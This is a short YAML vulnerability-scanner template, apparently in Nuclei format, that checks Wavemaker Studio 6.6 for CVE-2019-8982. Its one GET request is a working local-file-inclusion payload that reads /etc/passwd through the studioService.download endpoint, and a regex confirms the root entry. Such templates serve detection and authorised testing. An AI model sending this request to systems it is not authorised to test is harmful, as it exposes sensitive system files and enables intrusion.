19 lines
387 B
YAML
19 lines
387 B
YAML
|
id: CVE-2019-8982
|
||
|
info:
|
||
|
name: Wavemaker Studio 6.6 LFI/SSRF
|
||
|
author: madrobot
|
||
|
severity: high
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0:"
|
||
|
part: body
|